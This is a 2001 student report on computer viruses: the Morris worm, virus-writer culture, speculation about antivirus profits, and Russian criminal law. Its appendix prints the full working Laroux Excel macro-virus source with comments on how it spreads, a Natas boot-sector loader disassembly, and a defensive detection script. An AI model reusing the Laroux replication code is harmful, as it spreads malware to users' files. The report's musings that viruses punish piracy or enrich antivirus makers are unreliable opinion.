Computer viruses

Chuvash State University

Faculty of Economics

Report

COMPUTER VIRUSES

Author:
student of EC-13-98
Eugene Ivanov

Cheboksary – 2001

CONTENTS

A bit of history

What is a computer virus?

Who writes computer viruses?

To whose advantage are computer viruses written?

A legal notice. Penal Code of the Russian Federation

Synopsis

SOURCES

Appendix

A bit of history

On 2 November 1988 Robert T. Morris Jr., a graduate student in computer science at Cornell University (USA), infected a great number of computers connected to the Internet. This network unites the machines of university centres, private companies and government agencies, including NASA, as well as some military research centres and laboratories.

The network worm struck 6,200 machines, 7.3% of the computers on the network, and showed that UNIX was not invulnerable either. Among those hit were NASA, Los Alamos National Laboratory, a research centre of the US Navy, the California Institute of Technology and the University of Wisconsin (200 of 300 systems). Spreading over ARPANET, MILNET, Science Internet and NSFNET, it practically put those networks out of service. According to the Wall Street Journal, the worm penetrated networks in Europe and Australia, where cases of blocked computers were also recorded.

Here are some recollections of participants in the event:

Symptom: hundreds or thousands of jobs start running on a Unix system bringing response to zero.

Systems attacked: Unix systems, 4.3BSD Unix & variants (e.g.: SUNs) any sendmail compiled with debug has this problem. This virus is spreading very quickly over the Milnet. Within the past 4 hours, it has hit >10 sites across the country, both Arpanet and Milnet sites. Well over 50 sites have been hit. Most of these are "major" sites and gateways.

Method: Someone has written a program that uses a hole in the SMTP Sendmail utility. This utility can send a message into another program.

Apparently what the attacker did was this: he or she connected to sendmail (i.e., telnet victim.machine 25), issued the appropriate debug command, and had a small C program compiled. (We have it. Big deal.) This program took as an argument a host number, and copied two programs – one ending in VAX.OS and the other ending in SunOS – and tried to load and execute them. In those cases where the load and execution succeeded, the worm did two things (at least): spawn a lot of shells that did nothing but clog the process table and burn CPU cycles; look in two places – the password file and the internet services file – for other sites it could connect to (this is hearsay, but I don't doubt it for a minute). It used both individual .host files (which it found using the password file), and any other remote hosts it could locate which it had a chance of connecting to. It may have done more; one of our machines had a changed superuser password, but because of other factors we're not sure this worm did it.

All of the Vaxen and some of the Suns here were infected with the virus. The virus forks repeated copies of itself as it tries to spread itself, and the load averages on the infected machines skyrocketed. In fact, it got to the point that some of the machines ran out of swap space and kernel table entries, preventing login to even see what was going on!

The virus also "cleans" up after itself. If you reboot an infected machine (or it crashes), the /tmp directory is normally cleaned up on reboot. The other incriminating files were already deleted by the virus itself.

On 4 November the author of the worm, Morris, came to FBI headquarters in Washington of his own accord. The FBI imposed an embargo on all material relating to the Morris worm.

On 22 January 1990 a jury found Morris guilty. Had the maximum penalty been applied, Morris could have been sentenced to 5 years in prison and a fine of 250,000 dollars. Morris's attorney Thomas Guidoboni appealed the conviction to the Circuit Court of Appeals, which upheld it. In the end Morris was sentenced to three years of probation, 400 hours of community service and a fine of 10,050 dollars, and in addition Cornell University suspended him. The author then had to take part in eradicating his own creation.

What is a computer virus?

It is executable code able to reproduce itself. Viruses are an area of pure programming and, unlike other programs, carry "intellectual" functions for protecting themselves from being found and destroyed. They have to fight for survival in the complex conditions of conflicting computer systems. That is why they evolve as if they were alive.

Yes, viruses seem to be the only "living" organisms in the computer environment, and another of their main goals is survival. That is why they may carry complex encryption/decryption engines, which are by now almost a standard for computer viruses, in order to duplicate, adapt and disguise themselves.

It is necessary to distinguish between self-reproducing programs and Trojan horses. Self-reproducing programs will not necessarily harm your system, because their aim is to produce as many copies (or near-copies) of themselves as possible, either by attaching themselves to host programs or on their own. In the latter case they are called "worms".

Trojan horses, meanwhile, are programs whose purpose is to harm or damage the computer. Certainly it is common practice for the two to be part of one "techno-organism", but they have completely different functions.

That is an important point. Destructive actions are not an integral part of a virus by default. However, virus writers do allow destructive mechanisms, as an active defence against their creations being found and destroyed, and as a response to society's attitude towards viruses and their authors.

As you can see, there are different types of viruses, and they have already been divided into classes and categories, for instance: harmless, dangerous and very dangerous. No destruction means a harmless one, tricks with system halts mean a dangerous one, and devastating destruction means a very dangerous virus.

But viruses are famous not only for their destructive actions but also for their special effects, which are almost impossible to classify. Some virus writers suggest the following: funny, very funny, and sad or melancholy (keeps silent and infects). But one should remember that, in their view, special effects must occur only after a certain number of infections, and users should be given a chance to restrict the execution of destructive actions such as deleting files or formatting hard disks. On that reading a virus could even be considered a useful program, keeping a check on system changes and preventing surprises such as deleted files or wiped hard disks.

It sounds quite heretical to say such words about viruses, which are usually considered a disaster. The less a person understands programming and virology, the more the mere possibility of infection weighs on him. So let us turn to the creators of viruses as the best source.

Who writes computer viruses?

They are lone wolves or groups of programmers.

Although many people think that writing a computer virus is hard, that is not exactly so. Using special programs called "virus creators" (construction kits), even beginners in the computer world can build their own viruses, which will be strains of a certain major virus. This is precisely the case with the notorious "Anna Kournikova" virus, which is actually a worm. The aim of creating viruses in this way is pretty obvious: the author wants to become known all over the world and to show his powers.

However, the results of such an attempt can be very sad (see "A bit of history"); only real professionals become famous and stay uncaught. A good example is Dark Avenger. Yes, and it is another custom of participants of "the scene" to take terrifying monikers (nicknames).

To write something really new and remarkable a programmer should have some extra knowledge and skills, for example:

    good strategic thinking and intuition – once released, a virus and its descendants live their own independent life in nearly unpredictable conditions, so the author must anticipate a lot of things;

    splendid knowledge of Assembler1 and of the operating system he writes for – the more mistakes there are in the virus, the quicker it will be caught;

    attention to detail and the skill to solve the most varied tactical questions – one won't write a compact, satisfactorily working program without these abilities;

    high professional discipline, in order to join the preceding points together.

A computer virus group is an informal non-profit organisation uniting programmers who write viruses, regardless of their qualifications. Anyone can become a member of the club if he creates viruses or studies them for the purpose of creation and spreading.

The aims they pursue together may differ from those of a single virus writer, although they usually also try to become as famous as possible. At the same time they may help beginning programmers in the field of viruses and spread commented virus sources and descriptions of virus algorithms.

One can't say that all group members write viruses in Assembler. Actually, you don't have to know any programming language or write any code to become a member or friend of a group. But programming in Assembler is preferred; Pascal, C++ and other high-level languages are considered humiliating. That does make sense, since programs written in Assembler are much smaller (0.5-5 KB) and therefore more robust. On the other hand, Assembler is quite difficult to understand, especially for beginners: one has to think the way the computer does, since every instruction goes directly to the central processing unit of the PC.

There are computer virus groups all over the world, a few being more successful than others. It may be pretty hard to get in contact with them, since they are quite typical representatives of the computer underground, just like warez groups. Sometimes, however, creating viruses can become a respectable occupation bringing a steady income. After all, no one but the author of a virus can give such valuable information on how it should be treated and cured.

To whose advantage are computer viruses written?

Using unlicensed software, i.e. a cracked copy without registering it (jokingly called "copyleft" here, although that word properly means something else), is widely practised on the territory of the former USSR even by medium and big companies, to say nothing of ordinary users. Such software is stolen, which entails criminal liability (see the legal notice). One of the general values of our culture is generosity, and you can't do anything about it. But at least lovers of "free" software should know that continuing the practice can be risky. That is the first use of computer viruses: as a sort of compensation to software developers.

In the very same way, writing viruses usually does not bring profit to the author, at least when the author of a virus and the author of its cure are different people. The situation is quite different when they are not, especially if the person manages to hide the double-dealing. And that is the second advantage of computer viruses.

Yes, developers of antivirus software make money selling their remedy for a new virus widely hyped by the mass media. The agitation can grow so strong that everyone rushes to buy antivirus protection against even the most harmless virus. The ordinary behaviour of share indexes on stock exchanges during a computer virus epidemic is to fall. Somehow, the shares of companies such as Symantec (famous for its Norton Antivirus) soar up to the sky.

The tendency is especially significant in the world of the emerging New Economy. This fancy term means an economy based on computer services as the engine of development. The system has taken hold in the United States. That is why we hardly ever hear the names Dow Jones and Standard & Poor's in the mass media nowadays; their place has been taken by the NASDAQ Composite index, based on the National Association of Securities Dealers Automated Quotations system. The index tracks the performance of high-tech companies, the base of the New Economy.

We can't say for sure, but maybe in the near future the index will be influenced more by computers themselves than by brokers and dealers on the world's stock exchanges. IBM has recently presented its new invention, an automated broker, which is in fact a mainframe (a very big computer) with specialised software, a descendant of the Deep Blue mainframe well known for its chess skills. Unfortunately, it seems that bad times have come for the whole economy of the USA, which also means problems for NASDAQ.

Nevertheless, IBM's initiative should certainly be welcomed. Automated brokers seem to understand the volatility of indexes much faster and more rationally than human beings. There is only one drawback to eliminate, the problem of artificial intelligence: a machine can't think like a human.

Maybe computer viruses could be of some use here too. After all, flights to the Moon became a simple consequence of inventing new ways of exterminating the civilian population during the Second World War (ballistic rockets). A wish to kill people made a fantastic daydream come true within fifty years. The first computing machines were actively used during the development of the first atomic bomb. So sometimes even very bad things, much more dangerous than viruses (name at least one person who has been the victim of a cruel computer virus), can greatly assist progress and bring a greater profit.

A legal notice. Penal Code of the Russian Federation

Chapter 28. Crimes in the sphere of computer information

Article 272. Unlawful access to computer information

1. Unlawful access to computer information protected by law, i.e. information on a machine-readable medium, in a computer, a computer system or their network, if this act entails the destruction, blocking, modification or copying of information or disruption of the operation of the computer, the computer system or their network, –

is punished by a fine of two hundred to five hundred minimum monthly wages, or in the amount of the wages or other income of the convicted person for a period of two to five months, or by corrective labour for a term of six months to one year, or by deprivation of liberty for a term of up to two years.

2. The same act committed by a group of persons by prior conspiracy or by an organised group, or by a person using his official position, or by a person having access to the computer, the computer system or their network, –

is punished by a fine of five hundred to eight hundred minimum monthly wages, or in the amount of the wages or other income of the convicted person for a period of five to eight months, or by corrective labour for a term of one to two years, or by arrest for a term of three to six months, or by deprivation of liberty for a term of up to five years.

Article 273. Creation, use and dissemination of malicious programs for computers

1. Creating computer programs, or making changes to existing programs, that knowingly lead to the unauthorised destruction, blocking, modification or copying of information or to disruption of the operation of a computer, a computer system or their network, as well as the use or dissemination of such programs or of machine-readable media containing them, –

is punished by deprivation of liberty for a term of up to three years together with a fine of two hundred to five hundred minimum monthly wages, or in the amount of the wages or other income of the convicted person for a period of two to five months.

2. The same acts having caused grave consequences through negligence, –

are punished by deprivation of liberty for a term of three to seven years.

Synopsis

The history of computer viruses began only recently, but it has already become legendary. Almost everyone knows a few awesome fables about these creatures, but hardly anyone understands what a computer virus is.

A computer virus is executable code able to reproduce itself. Viruses are an area of pure programming and, unlike other programs, carry "intellectual" functions for protecting themselves from being found and destroyed. They have to fight for survival in the complex conditions of conflicting computer systems.

Viruses seem to be the only "living" organisms in the computer environment, and another of their main goals is survival. That is why they may carry complex encryption/decryption engines, which are by now almost a standard for computer viruses, in order to duplicate, adapt and disguise themselves.

Viruses are written by lone wolves or groups of programmers.

Using special programs called "virus creators", even beginners in the computer world can build their own viruses. The aim of creating viruses in this way is pretty obvious: the author wants to become known all over the world and to show his powers.

The results of such an attempt can be very sad; only real professionals become famous and stay uncaught. To write something really new and remarkable a programmer needs some extra knowledge and skills.

A computer virus group is an informal non-profit organisation uniting programmers who write viruses, regardless of their qualifications. Anyone can become a member of the club if he creates viruses or studies them for the purpose of creation and spreading. You don't have to know any programming language or write any code to become a member or friend of a group. Programming in Assembler is preferred; Pascal, C++ and other high-level languages are considered humiliating.

There are computer virus groups all over the world, a few being more successful than others. It may be pretty hard to get in contact with them, since they are quite typical representatives of the computer underground, just like warez groups. Sometimes, however, creating viruses can become a respectable occupation bringing a steady income. After all, no one but the author of a virus can give such valuable information on how it should be treated and cured.

Developers of antivirus software make money selling their remedy for a new virus widely hyped by the mass media. The agitation can grow so strong that everyone rushes to buy antivirus protection against even the most harmless virus. The ordinary behaviour of share indexes on stock exchanges during a computer virus epidemic is to fall. Somehow, the shares of high-tech companies producing antivirus software soar up to the sky.

An epidemic of foot-and-mouth disease has overwhelmed Europe these days (15 March 2001). It seems that a vast economic crisis is breaking out in America. World finance is doing its best to escape the worst.

A breakthrough in artificial intelligence could prevent NASDAQ from falling completely. The help may come from an unexpected side...

But don't forget that the creation, use and dissemination of malicious programs for computers is a criminal offence, as is using cracked versions of programs. Our Penal Code establishes a punishment of up to seven years of imprisonment.

And be aware that computer viruses are here for a long time, if not forever.

SOURCES

    Penal Code of the Russian Federation

    Bezrukov N.N. Computer Virology. Part 1: General principles of operation, classification and a catalogue of the most widespread viruses for the MS-DOS operating system. – Kiev, 1990.

    Infected Voice. Issue 1, September 1994. – STEALTH group.

    Infected Voice. Issue 2, October 1994. – STEALTH group.

    Infected Voice. Issue 3, December 1994. – STEALTH group.

Appendix

A fragment of a macro virus (Laroux), written in a high-level language (Excel Visual Basic, VBA). The code lives in a hidden module sheet named "laroux". auto_open hooks the OnSheetActivate event, and check_files then either plants a copy of that sheet in PERSONAL.XLS in Excel's startup folder, so it loads with every session, or copies the sheet from PERSONAL.XLS into whichever workbook is activated. The lines beginning with ' are explanatory comments added by the editor; the Attribute lines are what Excel writes when it exports a module.

Attribute VB_Name = "laroux"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    ' Runs when the workbook opens: from now on every sheet activation calls check_files
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    ' p = 1 if PERSONAL.XLS already exists in the startup folder
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PERSONAL.XLS")
    If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
    ' w = 1 if the active workbook carries any module sheet, i.e. the virus itself
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    Select Case whichfile
    Case 10
        ' Infected workbook is open and there is no PERSONAL.XLS yet: create one from the "laroux" sheet
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        Sheets("laroux").Visible = True
        Sheets("laroux").Select
        Sheets("laroux").Copy              ' copies the sheet into a new workbook
        With ActiveWorkbook                ' wipe document properties that could identify the source
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        newname$ = ActiveWorkbook.Name
        c4$ = CurDir()
        ChDir Application.StartupPath
        ActiveWindow.Visible = False       ' keep the new workbook hidden from the user
        Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        ChDir c4$
        Workbooks(n4$).Sheets("laroux").Visible = False
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "personal.xls!check_files"   ' re-hook, now served from PERSONAL.XLS
    Case 1
        ' PERSONAL.XLS is infected and the active workbook is clean: infect it
        Application.ScreenUpdating = False
        n4$ = ActiveWorkbook.Name
        p4$ = ActiveWorkbook.Path
        s$ = Workbooks(n4$).Sheets(1).Name
        If s$ <> "laroux" Then             ' skip if the first sheet is already the virus
            Workbooks("PERSONAL.XLS").Sheets("laroux").Copy before:=Workbooks(n4$).Sheets(1)
            Workbooks(n4$).Sheets("laroux").Visible = False
        Else
        End If
        Application.OnSheetActivate = ""
        Application.ScreenUpdating = True
        Application.OnSheetActivate = "personal.xls!check_files"
    Case Else
        ' 0: clean workbook and no PERSONAL.XLS; 11: both already infected. Nothing to do.
    End Select
End Sub

1 Assembler – a low-level, hardware-oriented computer language

An example of a boot-sector virus (Natas), written in a low-level language (Assembler). The original table set the two disassemblies side by side; here they are given one after the other. Offsets 0x34-0x3F and 0x69 onwards are identical in both (0x36-0x3D is the 8-byte file-system type field "FAT12   "); the virus overwrote 0x40-0x68 with its loader. The disassembler began decoding at 0x3F, so the first loader bytes (E8 00 00 at 0x40, a call to 0043) show up as jnl/add; from 0x43 on the listing reads cleanly: point DS at the BIOS data area (segment 0040h), subtract 6 from 0040:0013 (the size of conventional memory in KB, so 6 KB at the top of memory vanish from DOS's view), turn the new size into a segment address (ror ax,0A on a value below 1024 is the same as a shift left by 6), read 9 sectors from drive A, cylinder 4Fh, head 1, sector 1 into that segment with INT 13h/AH=02h, and jump there with push es / push bx / retf; if the read fails, INT 18h. (This walk-through is the editor's annotation, not part of the original report.)

A fragment of the infected boot record

hex address  dump         possible assembler source
00000034: 2020        and byte ptr [bx+si],ah
00000036: 46          inc si
00000037: 41          inc cx
00000038: 54          push sp
00000039: 3132        xor word ptr [bp+si],si
0000003B: 2020        and byte ptr [bx+si],ah
0000003D: 20F1        and cl,dh
0000003F: 7DE8    (1) jnl 00000029
00000041: 0000        add byte ptr [bx+si],al
00000043: BF4000      mov di,0040
00000046: 8EDF        mov ds,di
00000048: 836DD306    sub word ptr [di-2D],0006
0000004C: 8B45D3      mov ax,word ptr [di-2D]
0000004F: B10A        mov cl,0A
00000051: D3C8        ror ax,cl
00000053: 8EC0        mov es,ax
00000055: B80902      mov ax,0209
00000058: 33DB        xor bx,bx
0000005A: B9014F      mov cx,4F01
0000005D: BA0001      mov dx,0100
00000060: CD13        int 13
00000062: 7203    (1) jb 00000067
00000064: 06          push es
00000065: 53          push bx
00000066: CB          retf
00000067: CD18        int 18
00000069: FE0F        dec byte ptr [bx]
0000006B: 8B4618      mov ax,word ptr [bp+18]
0000006E: 8845F9      mov byte ptr [di-07],al
00000071: FB          sti
00000072: 386624      cmp byte ptr [bp+24],ah
00000075: 7C04    (2) jl 0000007B

A fragment of the boot record cured by DoctorWeb

hex address  dump         possible assembler source
00000034: 2020        and byte ptr [bx+si],ah
00000036: 46          inc si
00000037: 41          inc cx
00000038: 54          push sp
00000039: 3132        xor word ptr [bp+si],si
0000003B: 2020        and byte ptr [bx+si],ah
0000003D: 20F1        and cl,dh
0000003F: 7DA9        jnl 0000FFEA
00000041: 3D84BB      cmp ax,BB84
00000044: 61          popa
00000045: 2CBF        sub al,BF
00000047: 92          xchg ax,dx
00000048: C7C3665E    mov bx,5E66
0000004C: BFE236      mov di,36E2
0000004F: F1          icebp
00000050: 035C27      add bx,word ptr [si+27]
00000053: BE96D1      mov si,D196
00000056: 6B4D4AC0    imul cx,word ptr [di+4A],C0
0000005A: 7A65    (1) jp 000000C1
0000005C: DE7883      fidivr word ptr [bx+si-7D]
0000005F: 9ACF6C879D  call 9D87:6CCF
00000064: CF          iret
00000065: 0361B4      add sp,word ptr [bx+di-4C]
00000068: C4FE        les di,(Invalid)si
0000006A: 0F8B4618    jnp 000018B4
0000006E: 8845F9      mov byte ptr [di-07],al
00000071: FB          sti
00000072: 386624      cmp byte ptr [bp+24],ah
00000075: 7C04    (2) jl 0000007B





Find 10 differences (or more)!
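The same comparison done by a program, as an added example by the editor (it is not code from the report, from the Natas virus or from DoctorWeb). The script rebuilds both sectors from the hex columns of the listing: offsets 0x34-0x76 are transcribed from the table, while the jump at offset 0, the OEM name, the bytes-per-sector field and the 0x55AA signature are constructed filler so that the buffers look like a FAT12 floppy boot sector. It then flags the three things the infected column shows (DS pointed at the BIOS data area and 0040:0013 decremented, an INT 13h read, and a push es / push bx / retf into the loaded code), decodes the INT 13h arguments, and works out the segment the virus hides itself in on a 640 KB machine. The string patterns and the 640 KB figure are the editor's assumptions, chosen to match the listing.

```python
"""Boot-sector triage for a Natas-style resident loader (added example by the
editor, not code from the report, from Natas or from DoctorWeb). The two sample
sectors are CONSTRUCTED: offsets 0x34-0x76 are transcribed from the hex columns
of the listing; the jump at offset 0, OEM name, bytes-per-sector and 0x55AA are filler."""
import struct

# 0x34..0x76 of the infected sector (left column). The listing's disassembler
# started at 0x3F; read from 0x40 the bytes decode as call 0043, then the loader.
INFECTED_FRAGMENT = bytes.fromhex(
    "2020" "4641543132202020" "F17D"               # pad, "FAT12   ", two untouched bytes
    "E80000" "BF4000" "8EDF" "836DD306"            # call 0043; mov di,40; mov ds,di; sub word [di-2D],6
    "8B45D3" "B10A" "D3C8" "8EC0"                  # mov ax,[di-2D]; mov cl,0A; ror ax,cl; mov es,ax
    "B80902" "33DB" "B9014F" "BA0001" "CD13"       # INT 13h AH=02: 9 sectors, C=79 H=1 S=1, drive 0
    "7203" "06" "53" "CB" "CD18"                   # jb fail; push es; push bx; retf; fail: int 18h
    "FE0F" "8B4618" "8845F9" "FB" "386624" "7C04"  # remains of the original boot code
)
# Same offsets after DoctorWeb restored the sector (right column).
CURED_FRAGMENT = bytes.fromhex(
    "2020" "4641543132202020" "F17D" "A93D84BB" "612CBF92" "C7C3665E" "BFE236"
    "F1" "035C27" "BE96D1" "6B4D4AC0" "7A65" "DE7883" "9ACF6C879D" "CF"
    "0361B4" "C4FE" "0F8B4618" "8845F9" "FB" "386624" "7C04"
)

def build_sector(fragment, jump_target):
    """Wrap a 0x34..0x76 fragment in a 512-byte sector with constructed filler."""
    assert len(fragment) == 0x77 - 0x34
    sec = bytearray(512)
    sec[0:3] = bytes([0xEB, jump_target - 2, 0x90])   # jmp short target ; nop (filler)
    sec[0x03:0x0B] = b"MSDOS5.0"                       # OEM name (filler)
    sec[0x0B:0x0D] = struct.pack("<H", 512)            # bytes per sector (filler)
    sec[0x34:0x77] = fragment
    sec[510:512] = b"\x55\xAA"                         # boot signature
    return bytes(sec)

INFECTED = build_sector(INFECTED_FRAGMENT, 0x40)   # entry at the virus loader
CURED = build_sector(CURED_FRAGMENT, 0x3E)         # entry at the usual FAT12 code start

MEM_STEAL_PREFIX = b"\xBF\x40\x00\x8E\xDF"  # mov di,0040 ; mov ds,di -> DS = BIOS data area
SUB_WORD_DI_2D = b"\x83\x6D\xD3"            # sub word ptr [di-2D],imm8 ; 0x40-0x2D = 0x13
FAR_RETURN = b"\x06\x53\xCB"                # push es ; push bx ; retf -> jump to ES:BX
INT13 = b"\xCD\x13"

def is_boot_sector(sec):
    return len(sec) == 512 and sec[510:512] == b"\x55\xAA"

def filesystem_type(sec):
    """BS_FilSysType, the 8-byte text field at 0x36 ("FAT12   " in both columns)."""
    return sec[0x36:0x3E].decode("ascii", "replace").strip()

def find_memory_steal(sec):
    """(offset, KB subtracted from 0040:0013) or None. 0040:0013 is the BIOS word
    holding the size of conventional memory; lowering it hides the virus body
    above the new top of memory, out of DOS's reach."""
    i = sec.find(MEM_STEAL_PREFIX)
    while i != -1:
        j = i + len(MEM_STEAL_PREFIX)
        if sec[j:j + 3] == SUB_WORD_DI_2D:
            return i, sec[j + 3]
        i = sec.find(MEM_STEAL_PREFIX, i + 1)
    return None

def decode_int13_args(sec, lo, hi):
    """Linear scan of sec[lo:hi] for mov ax/cx/dx,imm16 (B8/B9/BA), decoded as
    INT 13h/AH=02h arguments. Enough for this straight-line loader; not a disassembler."""
    names = {0xB8: "ax", 0xB9: "cx", 0xBA: "dx"}
    regs, k = {}, lo
    while k < hi:
        if sec[k] in names and k + 2 < hi:
            regs[names[sec[k]]] = sec[k + 1] | (sec[k + 2] << 8)
            k += 3
        else:
            k += 1
    if not all(r in regs for r in names.values()):
        return None
    ax, cx, dx = regs["ax"], regs["cx"], regs["dx"]
    return {"ah": ax >> 8, "sectors": ax & 0xFF,
            "cylinder": (cx >> 8) | ((cx & 0xC0) << 2), "sector": cx & 0x3F,
            "head": dx >> 8, "drive": dx & 0xFF}

def resident_segment(base_kb, stolen_kb):
    """What the loader computes: the new conventional-memory size and the paragraph
    address of its new top. ror ax,10 on a 16-bit value below 1024 equals a shift
    left by 6, i.e. KB*1024/16."""
    new_kb = base_kb - stolen_kb
    return new_kb, (new_kb << 6) & 0xFFFF

def analyze(sec):
    r = {"boot_signature": is_boot_sector(sec), "fs_type": filesystem_type(sec),
         "memory_steal": None, "int13": None, "far_return_at": None, "verdict": "clean"}
    steal = find_memory_steal(sec)
    if steal is None:
        return r
    r["memory_steal"], r["verdict"] = steal, "suspicious"
    code_start = steal[0] + len(MEM_STEAL_PREFIX) + len(SUB_WORD_DI_2D) + 1
    i13 = sec.find(INT13, code_start)
    if i13 == -1:
        return r
    r["int13"] = decode_int13_args(sec, code_start, i13)
    fr = sec.find(FAR_RETURN, i13)
    r["far_return_at"] = None if fr == -1 else fr
    if r["int13"] and r["int13"]["ah"] == 2 and fr != -1:
        r["verdict"] = "infected"   # reads sectors to the top of memory, then jumps into them
    return r

if __name__ == "__main__":
    for name, sec in (("infected", INFECTED), ("cured", CURED)):
        print(name, analyze(sec))
    print("640 KB machine after the steal:", resident_segment(640, 6))
```

Running it reports the infected sector as "infected" with the memory steal at 0x43 (6 KB), the INT 13h read of 9 sectors from cylinder 79, head 1, sector 1 of drive 0, and the far return at 0x64, while the cured sector comes out "clean"; on a 640 KB machine the loader leaves 634 KB to DOS and places itself at segment 9E80h. The rules are deliberately specific to what the listing shows; a real boot-sector scanner would also compare the sector against a known-good image and follow the jump at offset 0 instead of pattern-matching a fixed register sequence.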